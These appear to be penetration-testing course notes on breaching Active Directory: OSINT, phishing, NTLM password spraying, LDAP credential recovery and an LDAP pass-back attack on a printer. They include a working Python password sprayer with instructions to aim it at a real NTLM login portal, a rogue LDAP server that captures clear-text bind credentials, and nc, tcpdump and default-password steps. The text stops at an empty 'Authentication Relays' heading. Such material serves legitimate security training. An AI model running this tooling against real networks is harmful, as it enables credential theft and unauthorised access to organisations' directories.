Breaching Active Directory

  • In this module, "breaching" means obtaining initial access, that is a first set of valid credentials, which we can then use to enumerate Active Directory and move laterally within it.

  • Two popular methods for obtaining that first set of AD credentials are Open Source Intelligence (OSINT) and phishing:

    • OSINT: data that has already been exposed publicly, e.g. credentials leaked in forum posts by employees, or hard-coded credentials committed to a public code repository on GitHub.

    • Phishing: getting users either to enter their credentials on a malicious web page or to run a specific application that installs a Remote Access Trojan (RAT) in the background.

New Technology LAN Manager (NTLM)

  • New Technology LAN Manager (NTLM) is a suite of challenge-response security protocols used to authenticate users' identities in AD. Kerberos is the preferred protocol in modern domains, but NTLM remains widely supported. NetNTLM is the variant services use over the network: the service passes the client's challenge-response on to a Domain Controller for validation, so it never sees the user's password itself.

  • This authentication mechanism is heavily used by the services on a network. However, services that use NetNTLM can also be exposed to the internet. The following are some of the popular examples:

    • Internally-hosted Exchange (Mail) servers that expose an Outlook Web App (OWA) login portal.

    • Remote Desktop Protocol (RDP) service of a server being exposed to the internet.

    • Exposed VPN endpoints that were integrated with AD.

    • Web applications that are internet-facing and make use of NetNTLM.

  • These exposed services provide an excellent location to test credentials discovered using other means. However, these services can also be used directly in an attempt to recover an initial set of valid AD credentials.

  • Since most AD environments have an account lockout policy configured (for example, five bad attempts within a 30-minute observation window), a full brute-force attack would simply lock accounts out. Instead, we perform a password-spraying attack: rather than trying many passwords against one account, we pick a single likely password and try it once against every username we have collected, then wait for the observation window to expire before trying the next password. Before spraying, find the policy (e.g. from the domain's password policy or the lockout behaviour observed against a throwaway account) and stay below the threshold per window.
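  • The scheduling logic behind this, as an added example that is not part of the original notes: a spray function that sends one password to every user per round and paces rounds by the lockout observation window, contrasted with a naive brute force. The users, passwords and the FakeDirectory class are constructed stand-ins so the code runs offline; against a real target you would replace the directory's login method with a function that attempts an NTLM login against the exposed portal and returns True on success.

```python
"""Lockout-aware password spraying, with a simulated AD-backed login for offline use."""
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass
class FakeDirectory:
    """Constructed stand-in for an AD-authenticated service (OWA, RDP, VPN).

    It enforces the usual lockout policy: lockout_threshold bad attempts inside one
    observation_window locks the account. Time is simulated through `now`/`sleep`.
    """
    passwords: dict                        # user -> correct password (constructed sample)
    lockout_threshold: int = 5
    observation_window: int = 30 * 60      # seconds; a common AD setting is 30 minutes
    now: float = 0.0                       # simulated clock
    bad_attempts: dict = field(default_factory=lambda: defaultdict(list))
    locked: set = field(default_factory=set)

    def login(self, user, password):
        if user in self.locked:
            return False
        # Only failures inside the observation window count towards the threshold.
        recent = [t for t in self.bad_attempts[user] if self.now - t < self.observation_window]
        if self.passwords.get(user) == password:
            self.bad_attempts[user] = []   # a good logon resets the bad-password counter
            return True
        recent.append(self.now)
        self.bad_attempts[user] = recent
        if len(recent) >= self.lockout_threshold:
            self.locked.add(user)
        return False

    def sleep(self, seconds):
        self.now += seconds


def spray(users, passwords, try_login, sleep, observation_window, attempts_per_window=1):
    """Try passwords against every user, never exceeding attempts_per_window per user
    inside one observation window. Returns {user: password} for successful logons.
    attempts_per_window must stay below the lockout threshold (1 is the safe default).
    """
    found = {}
    remaining = set(users)
    for i in range(0, len(passwords), attempts_per_window):
        if i > 0:
            sleep(observation_window)      # let every user's bad-password counter reset
        for password in passwords[i:i + attempts_per_window]:
            for user in sorted(remaining):
                if try_login(user, password):
                    found[user] = password
            remaining.difference_update(found)
    return found


def brute_force(users, passwords, try_login):
    """Naive approach for contrast: every password against one user in a row."""
    found = {}
    for user in users:
        for password in passwords:
            if try_login(user, password):
                found[user] = password
                break
    return found


def demo():
    """Run both strategies against fresh copies of the simulated directory."""
    users = ["a.smith", "b.jones", "c.brown"]
    # Constructed sample: the passwords the simulated directory holds.
    secrets = {"a.smith": "Spring2023!", "b.jones": "Welcome1", "c.brown": "Xk#9vT2q!Lm7"}
    candidates = ["Password1", "Summer2023!", "Welcome1", "Winter2023!", "Autumn2023!", "Spring2023!"]

    sprayed = FakeDirectory(secrets)
    spray_found = spray(users, candidates, sprayed.login, sprayed.sleep, sprayed.observation_window)

    forced = FakeDirectory(secrets)
    brute_found = brute_force(users, candidates, forced.login)

    return {"spray_found": spray_found, "spray_locked": set(sprayed.locked),
            "brute_found": brute_found, "brute_locked": set(forced.locked)}


if __name__ == "__main__":
    print(demo())
```

  • With six candidate passwords and a threshold of five, the brute force locks out a.smith before reaching the correct sixth password and locks c.brown too, while the spray recovers both guessable passwords without a single lockout because each user sees only one attempt per window.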

Lightweight Directory Access Protocol (LDAP)

  • LDAP authentication is similar to NTLM authentication in that users authenticate to the application. However, with LDAP authentication the application verifies the user's credentials itself: it holds its own pair of AD credentials (a service account), which it uses to bind to LDAP and look the user up, and then it verifies the credentials the user supplied.

  • LDAP authentication is a popular mechanism with third-party (non-Microsoft) applications that integrate with AD. These include applications and systems such as:

    • Gitlab

    • Jenkins

    • Custom-developed web applications

    • Printers

    • VPNs

  • If any of these applications or services are exposed on the internet, the same type of attacks as those leveraged against NTLM authenticated systems can be used. However, since a service using LDAP authentication requires a set of AD credentials, it opens up additional attack avenues. In essence, we can attempt to recover the AD credentials used by the service to gain authenticated access to AD.

  • If you could gain a foothold on the correct host, such as a Gitlab server, it might be as simple as reading the configuration files to recover these AD credentials.

  • These credentials are often stored in plain text in configuration files, because the security model relies on keeping the configuration file itself protected (its location and access permissions) rather than on protecting its contents.

LDAP Pass-back Attack

  • This is a common attack against network devices, such as printers, when you have gained initial access to the internal network.

  • LDAP Pass-back attacks can be performed when we gain access to a device's configuration where the LDAP parameters are specified, for example the web interface of a network printer. The credentials for these interfaces are frequently left at their defaults, such as admin:admin or admin:password.

  • We usually cannot extract the LDAP credentials directly, since the password is masked in the interface. However, we can alter the LDAP configuration, such as the IP address or hostname of the LDAP server. In an LDAP Pass-back attack, we point this setting at our own IP and then use the device's "test settings" function, which forces the device to attempt LDAP authentication against our rogue server. We intercept that authentication attempt to recover the LDAP credentials.

  • Let's take an example of a printer

    • We first found a printer reachable at printer.domain.xyz.com

    • We then enumerated the printer and found the settings page, settings.aspx, so we accessed the printer settings at http://printer.domain.xyz.com/settings.aspx

    • After that, we tried default credentials and got in.

    • In the LDAP settings we can see the username, but the password field is masked.

    • We try to read the password by inspecting the page source, but it is not present there either.

    • So we perform a Pass-back attack.

    • We first start a listener on our device on the LDAP port, 389: nc -lvp 389 (the port is privileged, so run it with sudo). This is the most basic option: it shows that the printer connects to us, but a plain netcat listener cannot complete an LDAP exchange.

    • For more control we should instead run a rogue LDAP server, for example OpenLDAP (slapd), so the printer can perform a real bind against it.

    • On OpenLDAP (or any other rogue LDAP server) we restrict the supported authentication mechanisms to the least secure ones (LOGIN and PLAIN), so that the printer sends the password in clear text instead of negotiating a stronger SASL mechanism. On OpenLDAP this is configured through the olcSaslSecProps attribute; confirm it by querying supportedSASLMechanisms with ldapsearch.

    • In parallel, capture the traffic on port 389 so the clear-text bind can be read from the packets: sudo tcpdump -SX -i <Interface Name> tcp port 389

    • In the printer's LDAP settings, we change the IP address of the server to our IP address.

    • We save the settings and then use the "test settings" function; the printer binds to our rogue server and the credentials appear in the capture.
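  • The bind the printer sends during "test settings", as an added example that is not part of the original notes: a small rogue LDAP listener in Python that decodes a simple BindRequest (BER-encoded, as defined by RFC 4511) to recover the DN and clear-text password, and answers with a success BindResponse so the device's test reports success. The DN and password in the constructed sample message are assumptions. If the device negotiates SASL instead of a simple bind, the parser only reports the mechanism name, which is exactly the case the notes above avoid by offering nothing stronger than PLAIN/LOGIN on the rogue server.

```python
"""Rogue LDAP listener: decode a simple BindRequest and hand back the credentials."""
import socket


def _read_tlv(buf, pos):
    """Decode one BER tag-length-value at pos; return (tag, value, position after it)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: low 7 bits give the number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def _encode_len(n):
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, value):
    return bytes([tag]) + _encode_len(len(value)) + value


def _int(n):
    """BER INTEGER content: an extra leading 0x00 when the high bit is set."""
    return n.to_bytes((n.bit_length() + 8) // 8, "big")


def parse_bind_request(msg):
    """Return the credentials from an LDAPMessage carrying a BindRequest, or None otherwise.

    Simple bind:  {"message_id", "dn", "auth": "simple", "password"}
    SASL bind:    {"message_id", "dn", "auth": "sasl", "mechanism"}
    """
    tag, body, _ = _read_tlv(msg, 0)
    if tag != 0x30:                         # LDAPMessage is a SEQUENCE
        return None
    _, mid, pos = _read_tlv(body, 0)        # messageID INTEGER
    message_id = int.from_bytes(mid, "big")
    tag, op, _ = _read_tlv(body, pos)
    if tag != 0x60:                         # [APPLICATION 0] BindRequest
        return None
    _, _version, pos = _read_tlv(op, 0)     # version INTEGER (3)
    _, dn, pos = _read_tlv(op, pos)         # name LDAPDN
    auth_tag, auth, _ = _read_tlv(op, pos)
    if auth_tag == 0x80:                    # simple [0] OCTET STRING: password in the clear
        return {"message_id": message_id, "dn": dn.decode(), "auth": "simple",
                "password": auth.decode()}
    if auth_tag == 0xA3:                    # sasl [3] SEQUENCE { mechanism, credentials }
        _, mech, _ = _read_tlv(auth, 0)
        return {"message_id": message_id, "dn": dn.decode(), "auth": "sasl",
                "mechanism": mech.decode()}
    return None


def build_bind_request(message_id, dn, password):
    """Encode a simple BindRequest (what a printer sends); used here to construct test input."""
    op = _tlv(0x02, _int(3)) + _tlv(0x04, dn.encode()) + _tlv(0x80, password.encode())
    return _tlv(0x30, _tlv(0x02, _int(message_id)) + _tlv(0x60, op))


def build_bind_response(message_id, result_code=0):
    """[APPLICATION 1] BindResponse with resultCode (0 = success), empty matchedDN/diagnostic."""
    op = _tlv(0x0A, bytes([result_code])) + _tlv(0x04, b"") + _tlv(0x04, b"")
    return _tlv(0x30, _tlv(0x02, _int(message_id)) + _tlv(0x61, op))


def serve(bind_addr="0.0.0.0", port=389):
    """Accept one connection, decode its bind, reply success, return (peer, credentials)."""
    with socket.socket() as srv:            # port 389 needs root (or a port redirect)
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_addr, port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            result = parse_bind_request(conn.recv(4096))
            if result:
                conn.sendall(build_bind_response(result["message_id"]))
            return peer, result


if __name__ == "__main__":
    print(serve())
```

  • Run it as root on the attacking host before pointing the printer's LDAP server setting at that host; the credentials land in the returned dictionary instead of having to be picked out of a tcpdump hex dump.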

Authentication Relays
